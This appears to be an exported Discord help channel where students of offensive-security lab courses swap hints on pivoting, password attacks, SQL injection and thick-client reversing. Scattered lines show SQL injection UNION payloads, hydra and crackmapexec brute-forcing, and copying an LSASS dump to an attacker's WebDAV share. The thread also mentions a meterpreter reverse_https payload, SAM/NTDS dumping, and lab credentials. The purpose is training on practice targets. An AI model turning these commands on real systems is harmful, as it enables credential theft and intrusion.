@agile kindle

I have been stuck on this module forever because it wont authenticate with the given creds.

I believe that's the module that has problems with sqsh, try mssqlclient.py instead

try adding -windows-auth

same error

gonna have to wait. Time to go home for the day

Yea, sorry. I'm not sure what could be the issue 🙁

I suspect its my parrot vm. I will try on my kali vm when I get home

Can anyone point me in the right direction with Attacking Thick Client Applications? I'm at the memory map part, and I'm kinda stumped.

The genuine answer atm is wait. The author is on vacation and staff is working on sorting things out with the module.

subdomains of subdomains

Good evening! I'm stuck in the RDP and SOCKS Tunneling with SocksOverRDP section! I'm supposed to copy some files into a host that I enter through xfreerdp... but whenever I type the scp SocksOverRDP-x64.zip ubuntu@10.129.42.198:~/ command I get a connection refused message...

They put this in the notes but don't say how am I supposed to do it without the scp command....

because the user isn't ubuntu? you're meant to rdp into the first host, pivot, then pivot again... i don't see why you're trying to scp ubuntu@ip when it gives you the username/pass combo to connect :)

no luck either with htb-student... seems ssh service is down

Can someone help me with SQLmap essentials Attack Tuning.

this section yeah?

https://academy.hackthebox.com/module/158/section/1439

Yeap 🙂

hint RDP

and use any of the various file transfer methods from the file transfer module

I don't see where there's an example for scp

in this section

There is not haha but since in all the module I have been using this method...

I will try other methods 🙂

:)

also xfreeRDP allows you to mount a drive to transfer files

Hi, can anyone help with why the first payload would work but the second causes an error...
' UNION SELECT '1',version(),'3','4',5--
' UNION SELECT '1',table_name FROM information_schema.tables,'3','4',5--

use LaZagne, will need to copy it over to the box you have access to using kira credentials.

Any ideas why this could be not working... I tried with several directories but can`t get the file transfer 😦

I have the files located where I'm running the impacket server... I tried with other .txt files and can't get anything transfered

Or any other easier way to transfer files...

whats your impacket cmd options, youve probably missed some settings

It is the way it was in the file transfer module...

I have tried many directories and many ways...

thats awesome but doesnt answer my question

Got it!

the files are in the directory you set up for the impacket share yes?

do n: <enter> then dir to see what's actually there

I need groups of HackTheBox

#rules + #welcome

Step it until you hit the banner in the command prompt window (or whatever you want to call it, essentially the program execution window that pops up), make sure you don't overstep or else you will end up in the wrong memory location. Then just follow the module instructions.

😄

hey for network enumeration with nmap, there is a section "service enumeration" I can't solve the question " Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. " with the hint "Remember that Nmap does not always recognize all information by default." I have tried doing a banner scan on the open ports sudo nmap --script=banner -v --packet-trace -p 22,80,110,143,139,445,31337 <ip address>. none of the headers returned seem to have a flag. i also tried using sudo tcpdump -i tun0 host <myip> and <theirip> while doing nc -nv <ip> <port> on all 7 ports. I do not see any flag and I have reset the machine and tried again. anyone know why? i have seen other people asking about the same question in the discord and when somebody responds with "have you tried netcat" they usually say that they got the flag, but im not seeing it for some reason.

Thank you thank you was working through the new footprinting module conent and ran into this same issue this solution worked for me.

||nc -nv 10.129.149.57 31337|| answer here

there is new content for footprinting?

oh maybe i started the academy after it was put in

This Thick Client Application module that was just added to the AttackingCommon Applications module is NOT well written. I know that this is partially due to the high educational standards I have come to expect from HTB material (their fault) and a lack of experience with Windows RE (my fault), but the module does NOT explain things well AT ALL. Anyone else have this experience? I was able to finish the first section, but ouch!

This is the part I'm talking about. There is a LOT of "stepping" involved here without a lot of explanation about why we stop here. The module mentions that the memory in this area is interesting. But why is it interesting?

no, it still didnt work.It run into a loop and it seems like a TLS error. Did anybody know how to fix it? TK

Can I get some assistance with the Attacking Common Services/ Attacking Email Services section? I have the username and password, but I can't find anything in this section on how to sign in with those credentials. Xfreerdp isn't working even though the rdp port is open. Any suggestions?

Need help with Server-side attacks Nginx Reverse Proxy & AJP, I've modified the file in the http block of /etc/nginx/conf/nginx.conf but get the error "'location' directive is not allowed here in /etc/nginx/conf/nginx.conf:64" not sure what the problem is ...

good day

Probably missed/commented too many brackets

@steady hawk maybe I added one and now I get "sendfile" directive is not allowed here...

@steady hawk got it ! thanks !

Is already reported. As far as I know they are still working on it. And yes, this part is not good at all.

Thanks!

Good morning from Spain, I've been stuck for a while in the PIVOTING, TUNNELING, AND PORT FORWARDING skills assesment! I found the first target I must log in but I'm trying to use proxychains xfreerdp but I can't get a session 😦 😦 anyone who recently worked out this module have any hints?!? Thanks!

If you have built your tunnel, then you must use proxychains

your system cannot resolve the IP address to a machine let's say it like that

how I can download openvpn on virtual machine?

By "built the tunnel" you mean adding the 127.0.0.1 9050 line to the proxychains.conf file?!

really sad i was asking for 3 days but no body response 😢

What are you stuck with?!

2 modules

could i dm you please

sure!

thank you

what exploit should I use

SMB could work

but

how do you know

what you use

By the port that is open, 445 is an SMB port

Can we speak a bit in dms?

Sure1

Hi i need help please for login bruteforcing attack , cross site scripting , server side attack , file upload attacks please i need some dm to disucss more deep , why its many i skipped becasue it takes me for long days

what exploit should I use

@rancid sand Do you think you will just download any exploit? You need to first check for vulnerability

how

i don't know how

usually the module and sections aim to teach you how

@rancid sand Start by reading and then do exercises, it will help a lot

Can I DM someone for DNS footprinting question 5 ? What is the FQDN of the host where the last octet ends with "x.x.x.203"?

I don't have anything about vulnerability

@rancid sand which module are you doing

Metasploit framework

And now i'm at msf components

Please guys I have a question. Is python important for SOC analyst?

Yes

Can we speak in dm pls?

Sure

Thanks 🙏

You're welcome

Hello all
I stuck in the question:
What is the name of the security regulation for credit card payments a company must adhere to? (Answer Format: acronym)
but in the session i input - The Payment Card Industry Data Security Standard

Depending on the os, it may be preinstalled

Anyone ?

When I try to install Xfreerdp on my Parrot machine i got this error message:
┌─[user@parrot]─[~]
└──╼ $sudo apt-get install freerdp2-x11
Reading package lists… Done
Building dependency tree… Done
Reading state information… Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.6.1+dfsg1-3~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.

Anyone can help please?

HI
I'm stuck on Attacking Splunk in attacking common application.
I use the package on github.
I clone it, edit the run.ps1 with my ip and port.
I create a tarball and upload it on the application but I don't get the reverse.
I tried with tar & spl file and tried many port too.

@long grove there is no need to spam it in multiple channels

Not working for me

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

https://www.reddit.com/r/debian/comments/vcpcpe/cant_install_freerdp_neither_freerdp2x11/

@acoustic owl └──╼ $sudo apt-get install aptitude
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
aptitude is already the newest version (0.8.13-3).
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
┌─[mithu@parrot]─[~]
└──╼ $sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
freerdp2-x11{b}
0 packages upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.10.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

 Keep the following packages at their current version:

1. freerdp2-x11 [Not Installed]                       
   

Accept this solution? [Y/n/q/?] y
No packages will be installed, upgraded, or removed.
0 packages upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B of archives. After unpacking 0 B will be used.
Scanning application launchers
Removing duplicate launchers or broken launchers
Launchers are updated

┌─[mithu@parrot]─[~]
└──╼ $xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.137.146
bash: xfreerdp: command not found
┌─[✗]─[mithu@parrot]─[~]
└──╼ $^C

try installing remmina if you are having difficulties with xfreerdp

I think you should answer this question with no

Someone who has recently done the Pivoting, Port Forwarding skills assesments lately?!?!

@autumn pilot tnx

getting started knowledge check: I'm logged on the site as admin. I click the upload files button and nothing happens. Should I be able to upload a file here? Is this some kind of bug or am I missing something?

If anyone has solved the bash scripting module and could give me hint of this question, I would appreciate it!

take a look at ||the SSL certificate, might reveal a user to narrow down your search||

please remove that as you're leaking the usernames and a password which aren't provided.... you can use commands like sed, grep, and awk to get specific fields.

Thanks

are you sure you're looking at the SSL certificate?

if you still need help, I solved this lab again and can nudge you in the right direction 🙂

SQLmap essentials Bypassing Web Application Protections can someone help with this section?

which question?

What's the contents of table flag8? (Case #8)

dm me

Im sure you have figured it out by now, but just in case checking in to see if you still needed help with it.

ACTIVE DIRECTORY ENUMERATION & ATTACKS -->> Skills Assessment Part II

I need some help on getting the fourth question:
Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

look back at one of the earlier sections from that module 🙂

i tried password spray.. but i don't know what i'm doing wrong

you can dm

sus

hello, on the nmap service enumeration. i'm having a hard time with the question. it is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer". i ran the command "nmap <target ip> -p- -sV". i can see the services and open ports. i have tried entering them into the answer, but it keeps marking it wrong, and suggested i ask here. i've tried entering the service next to the open ports one by one, their versions, both together, and the service info (os, host, cpe). i'm very new to this, so please forgive me if this is a dumb comment.

try with : nmap -sC -sV -p- <<TargetIP>>

and set verbose : -vv

@knotty quest I figured it out. I was dumping the wrong address. I still don't understand why the address I dumped works though. It has the same privileges as other maps.

thank you, i will try that right now. i appreciate the response

but are you running enumeration of services without a firewall or are you in the firewall bypass module?

if you're trying to evade a firewall that changes everything

doesn't say. i'm assuming not there yet?

What is the name of the module you are making?

*running

network enumeration with nmap, under the service enumeration page

is it possible that once you have identified the services you have to scan the flag service port?

I made that module but I can't give you the answer or it would be a spoiler

i understand, no worries. thank you for your help

cool, good luck 😉

Is there ever a reason not to use crackmapexec to dump the SAM/LSA/NTDS databases if I have remote access? Is the longer way of transferring everything manually stealthier?

For the DNS bit in footprinting, the last question. “What is the FQDN of the host where the last octet ends with “x.x.x.203””

I’m completely lost on what I need to do. I tried Dnsenum but it gives me nothing.

Have you tried a different wordlist?

you need to find/enumerate all the zones

I got it….I made a spelling error in the command 🤦‍♂️

In Advanced File Disclosure, I got the flag using error method, but the question says I can get it using CDATA method - my question is. How ? 😄 Ive been trying different things, and at this point I am willing to accept a clear "this is how you do it"

can I dm anyone on Skills Assessment - WordPress from HACKING WORDPRESS in the last question?

managed to get it. thank you.

I have the password and user name to password attack module but its not letting me RDP or SSH

i Nmaped Im suppose to ssh to the target and i got the creditantials but it isnt letting me login

are you sure you have the right credentials? does it require a public key?

which section is this?

Password attacks network services

hydra or crackmapexec?

crackmapexec?

igot in winrm nvm

ok. i would suggest using hydra and running it against the different services

im in evil-winrm but i cant find the file

is someone here knowing lua

found it

lol

Hey guys I am stuck on a Password Attack module the question is "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer." I have done the command 'sudo crackmapexec winrm 10.129.75.108 -u user.list -p password.list' to possibly get the username of wsman but I am clueless on how to crack the password from here

ACTIVE DIRECTORY ENUMERATION & ATTACKS -->> Skills Assessment Part II

I need some help on getting the seventh question:
right in the mssql.. were able to upload a tool and executed it but it goes into the system and then comes off

For the Firewall and IDS/IPS Evasion - Hard Lab I think I found the ports that could possibly give me the flag but not sure been at it for about an hour port 68 and 138 am I one the right track?

The only two filterd | open ports I got back

||so you can execute commands, but the script doesn't stay in the context of SYSTEM... maybe there is another technique you can do to persist🤔 ||

Thanks, i've already solved it

I believe most people have stated they have better luck doing this exercise from Pwnbox. ||there is a high port you need to look into||

Yes im on pwnbox

look at the spoiler tag, that's a hint for solving the lab 🙂

Hi

ohhh

thanks

Can I DM someone regarding" Nmap Firewall IDS/IPS Evasion Lab - Medium"?

where are you stuck at on it?

I just can seem to the command correct, I can enumerate the port the cant get the version/flag to read out.

DMed you the command, so I dont spoil anyone

ok give me one sec ima visit the lab and see what I did right quick

Sure, no problem, thank you!

@gritty sundial this is the hint I got that helped me alot with this lab "remember that dns is UDP"

Try it with the PwnBox

Why doesnt ls work on my SSH target

^^^^

I don't know, but I was helping someone with this question this morning. Via VPN it did not work, the same command worked with PwnBox.

is pwnbox the instance within the lab?

it still did same thing on pwnbox

so weird

says ls is not recognized as a intenral or external comand

yes

@acoustic owl Is this question just broken because you can't 'ls'? I need to do this module for class so if thats the case I need to make a note
" Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. "

for password attack module

yeha im ocnfused about the same one

I am talking about the module Network Enumeration with NMAP
The Medium Lab works in the PwnBox. Apparently, however, there is a problem when you try it via VPN.

no because my first question Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. did not work in PWNbox when i entered the exact same command from vpn

This is a Windows host, right?
Under Winows you need dir instead of ls

^

https://gyazo.com/03866f393d3e16535c667f95ef48a35b

@acoustic owl

its a screenshot

thats not sus at all

it says dir: NT_STATUS_NO_SUCH_FILE

basically same error as ls

you dont have to click it but just know i tried 'dir' when i connected smb and i got same error as ls

" Find the user for the SSH service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. "

Your printscreen shows something completely different

Please tell in which module, which section and which question you are currently working on

On windows fundamentals module if anyone is wondering how to use the mount command on your Linux host to browse SMB share on a windows host/target machine.

Windows Share name = Company Data

The following command shown in the windows fundamentals module does not work because you have to specify the correct location on your Linux host to create a mount point for the windows share.

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //ipaddoftarget/"Company Data" /home/user/Desktop/

Use the below command with the correct syntax:

sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //ipaddoftarget/"Company Data" /home/<Your Kali Hostname>/<Directory of choice e.g. Documents or Desktop etc.>

If your mount command ran successfully then you won't see any error message and get the prompt back.

Next check all the current mount points and see if your mount point was created successfully by using "findmnt" command. You should see your mount point at the end of the list. It should show up on the mounts list as following:

/home/kali/Desktop //<IPAddressofWindowsHost>/Company Data
cifs rw,relatime,vers=3.1.1,cache=strict,username=htb

Browse the mount point by using "ls /home/<Your chosen directory where you created the mount point in the last command>"

The web information gathering module wants to know the number of A records. Running a separate brute force for each subdomain discovered in the zone transfer doesn’t seem like the most efficient approach. I’ve solved the challenge but this is bothering me.

Does anybody know of a more efficient way to recursively brute force subdomains? I’ve written a bash script to loop through a list of subdomains stolen from a zone transfer. However, that will only brute force subdomains of the current subdomain.

When specifying recursion in dnsenum I get an error advising there is no nameserver for that subdomain even when specifying the nameserver. I think it try’s to query the nameserver of the discovered subdomain automatically. I've tried with a few other tools like gobuster but they don't seem to query the discovered subdomains either.

Is there is something out there that will brute force $sub.domain.com. then append the discovered $sub to domain.com (as say $dsub) and then brute force $sub.$dsub.domain.com until the wordlist is exhausted. Recursion all the way down.

ATTACKING COMMON SERVICES : Attacking Email Services
I got the Password poo* and the user ma*
I cant login with telnet IP 25/110
Can someone give me a hint?

Any other ports open?

25 smtp
110 pop3
143 imap
587 smtp
1433 MSSQL
3389 ms-wbt-server

Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

so you've tried smtp and pop3, have you tried imap?

Yes i have it doesnt connect with telnet

But i got the password for smtp with smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.178.151

And brute forced the password with hydra hydra -l 'ma*' -P pws.list -f 10.129.178.151 smtp

tried rdp?

Yes didnt work

Try using an email client instead, like evolution

Might save some headache

Also try using the username (user)@inlanefreight.htb

Your command spoils it

But the password poo* is correct or?

Idk try it and see

Anybody willing to give me a nudge on Skills assesment for SQLmap?

Hey! Im doing the password attacks module and while i tried to exfiltrate the LSASS dump i could not connect to my webdav share. I can ping myself form the target but when i try copy it says this:

PS C:\Users\htb-student\AppData\Local\Temp> copy .\lsass.DMP \\<MY IP>\DavWWWRoot
copy : The network path was not found
At line:1 char:1
+ copy .\lsass.DMP \\<MY IP>\DavWWWRoot
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand

what am i doing wrong?

I want to learn what equipment should I prepare?

all you need is a web browser really

for beginning

Because webroots don't require you to actually specify. They're there, usually if it's a default upload directory or something. But you have to think of it is "where am I landing first" with your WebDAV. If it's the webDavRoot you're fine

the module said "Note: DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server."

Anyone else feel brutalized by "Exploiting Web Vulnerabilities in Thick-Client Applications" in Attacking Common Applications?

Can I get some assistance with the Attacking Common Services/ Attacking Email Services section? I have the username and password, but none of the telnet options seem to work with getting access to the service. Xfreerdp isn't working either even though the rdp port is open. Any suggestions?

Yeah the staff is aware about it being an issue and working on resolving it. The author is away on vacation atm.

In the Command Injection Module, section Advanced Command Obfuscation can someone provide any hint on how to solve this exercise?
Particularly how to bypass ; blacklist in this case!

@thorn urchin I actually really like the new content so far, it just feels like a massive tangent away from the original pacing.

Its literally the worst piece of academy content I have ever seen and a staff member told me they thought I was being too nice.

lol

Is there not a review process?

Bro I thought I was the only one suffering.. its so bad.. Can anyone whepp.. I literally cannot find the .bin file for 2hours now

Connect to the target host and search for a domain user with the given name of Robert. What is this users Surname?

someone know what to do? is PowerShell

Get-ADUser -filter 'DisplayName -eq "Robert"'

I tried this and with others filters

@ashen fog if you're still struggling. I figured it out. Just DM me and I'll give you a hand with it.

Now i have it too

Did u do it with IMAP?

Cool. No, I did it with POP3. I found the commands online for navigating it and opening emails.

IMAP wouldn't connect for me for some reason.

thew new content is not well tested..

It's very well understood about that lol look in #858470491676737536

Did u had to encode the password and username in base64?

Nope. Didn't have to do that at all. I just used the user name and password through POP3. Here is a link to the instructions I found for POP3 https://www.shellhacks.com/retrieve-email-pop3-server-command-line/

@foggy light bin file?

memory address for the correct bin file @static roost

i can pm you

yea

I am tinkering with kali a bit and ran into an odd issue.
From the top down I made sure the vpn is connected and has the correct routes in place. attempted to nmap the target.... claims it's down (note that -Pn works)
pings the target and got a response.
sudo nmap and it works just fine.
I should probably know why a non-sudo nmap isn't working but I am drawing a total blank. If anyone could point me in the right direction I'd appreciate it.

Non sudo means that it can't bind to ports

why does this work on parrot, but not kali?

¯_(ツ)_/¯

🙂

please someone who know how to filter by size in windows cmd

sort-object works for powershell, cmd might be able to use sort but I am not sure there is a good single keyword so to speak for cmd. might need some google-fu on that one

@static roost ++++Rep

@foggy light

I completed every question on the Footprinting - DNS module except the first question. I am confused what it is asking for. For reference the question is: Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.

What does fqdn mean, read the module carefully about DNS records

So the question is asking for the FQDN for targeted IP? The way the question is phrased, I don't know what its asking for.

'

yes...yes it is... what about the question is really giving you any reason to not know that's what it's asking for?

I figured it out. I still think it was just a poorly worded question, because I didn't know what the scenario wanted as an answer.

the oracle-tns section. That was newly added

It's like brand new btw

i looked in the module i didnt see any parts that i havent done yet

¯_(ツ)_/¯

the coruse on the website is for beginners?

DM me.

has anyone worked on Advanced SQL Injections module?

Yes

is it possible to get a help with Reading and Writing Files?

Sure DM

It can be :)

guys, attacking common services | Mail services when i connect to mail server pop/imap responds OK but i can't issue commands as it doesnt respond. Any idea?

Wait a few moments after attempting a command

it's been 10m xD

and then disconnects me for inactivity

-ERR Autologout; idle too long

Also it doesn't look like you're running any commands, just typing

it should at leat issue an error

and i've tried commands aswell

(placeholding commands, already got user:pass)

I can't see the left-hand side of the terminal

mb, 1 sec

same for pop and smtp btw

Ik this is probably not the place or the channel to ask but I'm wondering if y'all know how to recover a hacked account?

no

support / recover ur password via email

we have no idea

reach out to the appropriate support

Alright just exactly my plan earlier I will leave thanks

xD

running this section on my vm give me a moment to verify if you may need to just reset your vpn connection/changevpn region or reset the box :)

will try it with my own vm later then! As always, thanks a lot Marcie 🙂

after attempting in my own vm; it works perfectly fine; will do the double test in pwnbox

@sly reef it seems to be working perfectly fine in pwnbox as well (us-academy-1 hopefully it's just a thing where if you reset your instance it just works

Hi there

Noted, have had many problems with this module boxes

I'm reworking my notes for earlier modules at some point so this helps keep some of my documentation for modules in line :D

I'll redo everyone before certs and take notes aswell ^^

hey guys, I am stuck at the bruteforcing part of 'Attacking Common Services - easy lab'; I have found the user f**** but I cannot find a proper wordlist to authenticate the user in the service... any hints?

It's my pleasure

try the password list from the resources

that failed

I am currently trying rock_you

on smtp

are you using the wordlists present in /urs/share/dirb ?

are you using gobusters to enumerate the domain ?

if you enumerate inlanefreight.htb you can search for the flag moving in the various url of the domain, you can also build a bash script that automates the search

Are there any users interested in crack assembly challenges who want to form a team?

I think in the module Shells and Payloads Anatomy of a Shell Question 2 In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.is broken. I run the command and I clearly see the version of it, but it always tells me that its the incorrect answer.

are you using your own parrot virtual machine or the one made available by the htb platform?

the one by htb

if you have a parrot machine of the same version you can try running the command and see if the answer is correct

I tried the current version of it and still it did not work

Ah

nvm

I think I got it. I can not read apparently

tried with pwnbox and my VM. Not working

show who how to output the content of a file while filtering

with gci

https://academy.hackthebox.com/module/112/section/1067

Does anyone know the answer to the last question of this module?

Total brainfreeze right now. Doing the AD Enumeration and Attacks module, ACL Abuse Tactics and it starts by saying: "We can start by opening a PowerShell console and authenticating as the wley user." and I just cant figure it out? HOW?! (I know this i basic stuff but sometimes you know...)

I'm in the getting started module on the public exploits section. I can get to the target in a browser from the pwnbox but i'm not able to ping or get any results from nmap. I fee like i'm missing something stupid

Remember that Linux-based operating systems do not have a "C:" drive.

There are two types of targets on academy, that being said one of them requires additional knowledge how to be checked via the command line

I did try the -Pn switch if that's what you're getting at. This only the second module on the path so i wouldn't expect it to be anything complicated

nope

-Pn won't help you to understand if the port/target is alive for this section and exercise

Interesting. It worked for the previous section. I'll go back and read again. maybe i missed something in the instructions

A hint, the target has a port, what does that port do and correspond to which service

Hello!
Final task of wordpress module, when trying to edit 404.php. Any suggestions?

try not to update the main theme

I'm not able to get nmap to return any results to see open ports. I can see from the instructions they tell you what is running. are you meant to just follow that and not use nmap?

You don't need nmap

🤦‍♂️ I tried that, but I guess I didn't press select. Thank you!

You have to delete all characters and overwrite them completely.

Interesting instructions on the page "Once we identify the services running on ports identified from our Nmap scan" 🤣

curl, wget, nc and etc

it can say nmap, but you are forgetting that you are given a service which runs on a specific port, while you are trying to scan the whole docker container where only one port is being open which is not even default one

I need another hint for Firewall and IDS/IPS Evasion - Hard Lab I got told to look for a high port but I cant find a high open port

hey has anyone encountered this problem when doing " remote/reverse port forwarding with SSH " ?

are you sure you are using the correct payload

Hello, im doing the Pivoting, Tunneling, and Port Forwarding Skill Assessment im trying to ssh with mlefay. Just get "Permission denied". Any hint?

i used windows/x64/meterpreter/reverse_https

just like the module instructed

🤷🏼‍♂️

In case you're still stuck, I had to do the request from the beginning to work. Intercept -> modify value -> re-sign assertion and send.

oh sorry. yeah i used "exploit/multi/handler"

like the module said

In case you're still stuck, make sure you're using the right method to import the private key. Its described in the module, but I missed it on first reading.

ahh i see what you mean

thanks

@autumn pilot change the payload

damn i was struggling with that for a few days wondering why i couldnt get it to work

thanks again @autumn pilot

What methodology do you use when walking through the Academy modules? Do you take notes? Create flashcards? Or just give it a read and then move on to labs etc.

I want to make as much stick as possible

notes, and expanding the notes

Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '}

what am i missing to get the username of the brute force attack?

ty

HELP! In the new Attacking Common Applications module: Exploiting Web Vulnerabilities in Thick-Client Applications, I finished the module and got the SQL Injection to work so that I have an admin user with access to the uname feature of the app, but the MF module is not accepting the result of that command as the correct answer to the question! I am SOOOO beyond frustrated with this module. I literally came out of my chair when I saw that the login was successful and the commands were no longer greyed out. What is the format this question is looking for in the answer?

What is the content of the Uname option under the ServerStatus tab in the fatty-client application?

I'm still stuck on the XSS module, phishing lab. Anyone who might be able to help? I shared a detailed note on cbbh #cwes message . Any tips would be great

you need to specify the URI path

this is a known-issue and they're working on a fix, in the mean time the section is unsolvable.. some people, including myself, have had success messaging support, with proof of completing the section and the right answer is provided. you'll either have to wait for the fix and move on or message support.

I added the URL path when submitting the link to the send.php and the link was accepted. Still i couldn't capture any credentials via my php server

additionally check if you have specified the correct port

and I'm pretty sure the issue is within the url and php that you are specifying for the phishing bot to visit

i used port 8080 because 80 is being used on pwnbox. Can this affect?

yes

mhm. I'll try check on an external vm then. Pwnbox won't let me use port 80. Not like i can kill the service port 80 is being used by without killing my pwnbox instance

if you use 8080 you need to specify it

where?

in the url

Let me try that. Thanks a lot @autumn pilot . It worked!!!

@rustic sage Dumb question: How do I message support? And: is the correct answer contained in the supposed answer? Can I message you?

there should be a green button on the bottom right of your HTB Academy window to message them. if you do not see it, disable any sort of ad blockers/trackers in place. the issue with the lab right now is it's run with a docker container and the uname output is therefore changed every restart. if you message support with enough proof of completing the lab, they'll send you the correct answer to move on

how can i download challenge from htb ctf

Its gray

I see....

Someone could help me on Attacking Thick Client Applications ?
I'm trying to reproduce the steps but I'm a bit lost and I don't understand how to solve this section

what part of thick client applications?

You can DM me where you are. I just finished thath

@livid bluff my general hint for that module is "keep stepping"

@rustic sage I contacted support. Than you for the help. I thought I was losing my touch...

The first part to the question:
What are the credentials for restarting the Oracle service found at C:\Apps?

I imagine that it is necessary to reproduce the example of the course with Restart-OracleService in the folder C:\Apps

But in x64dgb I don't understand what address to use to make the dump

You do pretty much just follow the course instructions for this. The part that was vague to me was the "stepping" through the binary with x64dbg. You have to keep stepping until you hit the splash screen, so make sure you can see both windows.

I don't remember there being credentials to run the program though

Well yes, in this part I don't find the same thing as in the course.
When I go to Checking the memory maps I don't understand what address to dump.
I tried several times but each time it doesn't work

You dumped the wrong part of memory in that screenshot

unfortunately, I cannot help with that. I myself don't understand memory maps too well and all I could provide is the answer to solving the lab. they're working on a better explanation for that section.. all I can say is reread and look at the pictures provided.

whenever you open a binary/program in x64dbg it opens a command prompt along side it. this is the program running in real time, there is no output because you've not executed the program. with x64dbg you can step through each memory address of the program's execution. My hint to you, is don't Step Into.. it will take forever. Use the Step Over button (which I believe is F8). when they mention "the ASCII banner is being displayed.", what they mean is once you hit a certain memory address (I forget how many Step Over's it is..) you will see the ascii art "Restart Oracle" appear in that command prompt. Once you get to that step analyze the dump and memory maps as shown in the pictures.

^^^

You have to start the executable from the beginning and then click on the "step into" button or press F7 a BUNCH of times until you get to the splash screen. You'll know when you are there based on the screenshot in the module:

the explanation on what memory address to dump is not explained well, but is shown in the pictures. again, there is a fix coming soon (or so I've been told) that will provide a better explanation for this.

DO NOT HIT STEP INTO

🤔

Wait, why?

That worked for me....

I mean, I normally don't step into things, but that's because I don't like the smell.

there is a huge difference between step into and step over. The reason your output is taking so long, and you clicked so many times, is because you're "stepping into" every single function. In simple terms, if you "step into" a printf function you're going to go through every assembly instruction to get printf working (not too bad right?). However before you see the ASCII art in the main function, every library the program uses is loaded. Meaning the reason you clicked F7 "a BUNCH of times" was because you stepped through every assembly instruction to load every library the program uses. Step Over will as the name suggests step over this function (while still executing the assembly instructions).. saving you time. You only want to use Step Into when you want to analyze the specific function call further. Other than that save yourself time and money and use Step Over

🤣 Wish that info had been in the module!!!!

Hello

I assumed Stepping Over would not execute the assembly.

Now I am going to step "out" of this convo.

Sup folks!
Is there anyone that could chat a little about information gathering module? Not asking for answers just trying to understand what I've done so far!

Thanks for your help @twilit cipher and @rustic sage
when I click just 3 times I get to the end and I can't find the right information 😦

1) Make sure you're following the steps exactly how the section lists them
2) Upload the right executable to x64dbg
3) Click Step Over, or F8, while keeping an eye on the spawned command prompt. You'll want to click this button until the ASCII art is displayed in the command prompt.
4) If this doesn't work, you can search for the main function (shown in one of the screenshots) and set a breakpoint right before it. Then hit (F9, I believe..? or run the program). This will execute all the assembly instructions/code up until your breakpoint which should be right before the ASCII art is printed.
Help: The ASCII art is printed at "0x401917 | syscall" in the image provided, right before "0x401914 | jmp restart-service.401918"

you cannot use locate command in Powershell

I am stuck on this

Well I restarted the machine and restarted everything, I had indeed a problem with my executable.
Now I managed to display the banner.
But I don't understand in the memory maps which line I should choose for the dump

I completed the lab but I’m still researching that part🤷🏼‍♂️ I can only provide the answer which isn’t beneficial. I will say the lab does show in the screenshot what address to dump. support has said there will be a fix soon with a better explanation

in the mean time you’ll either have to do what I’m doing and learn about memory maps😅 wait for the explanation to be updated, or wait for someone else who does understand

Locate should be on your system, it's asking where is it on your system

Yes I got it now

and I learned some hardcore powershell commands because I thought I need to locate it in the targets directories : )))

Ahhhh dammit. When did Footprinting and Attacking Common Applications get updated? Now I need to redo those to finish the Pen Test Path 😢

Thanks a lot, i found it !!
the next part scares me lol

March 28th

I’d recommend going back and looking at the updated explanation when it comes out 🙂 and no that was the hardest part dw

Fair warning the new sections were NOT well tested

most of the issues are fixed now? The only issue that remains is Attacking Thick Client Web Applications.

Attacking Thick Client Applications is solvable you just need to do some outside research.

HI I'm stuck with Active Subdomain Enumeration questions, Would someone help please ?

is there an issue with the question " One of the pages you will identify should say 'You don't have access!'. What is the full page URL? " on the Attacking Web Applications with ffuf skills assessment?

I'm certain I have the page, but the ways I've tried to format my answer aren't accepted

@rustic sage I was able to get the source code for the restart-service_00000000001E0000.bin file. However the string for the password does not seem to be accepted as the correct answer. Can I dm you a screenshot to see if what I am looking at is correct?

Does anyone know how to infiltrate?

I’m not at my computer atm. Are you sure there is no leading or trailing white spaces?

What helped you with it mate, same problem and that makes me a bit mad

but yes @slow ruin you can dm me and I’ll check my answer when I get a chance

Just got it to work. Need the format as username:password

what a nightmare lol

but thank you @rustic sage for all the help here on the discord!

Dammit!

I sent the payload first then I sent the command in the next sending. My error was sending both payload code and the command at the same time

Hmm, strange, I just doing as you but it still frozen, could you dm me?

Hey so I tried changing my health on doom 64 from 85 to 400 and it did indeed change but I died at 325 everything was done with squalr as I am@just learning about this stuff but does anyone know what I did wrong ?

@kind turret

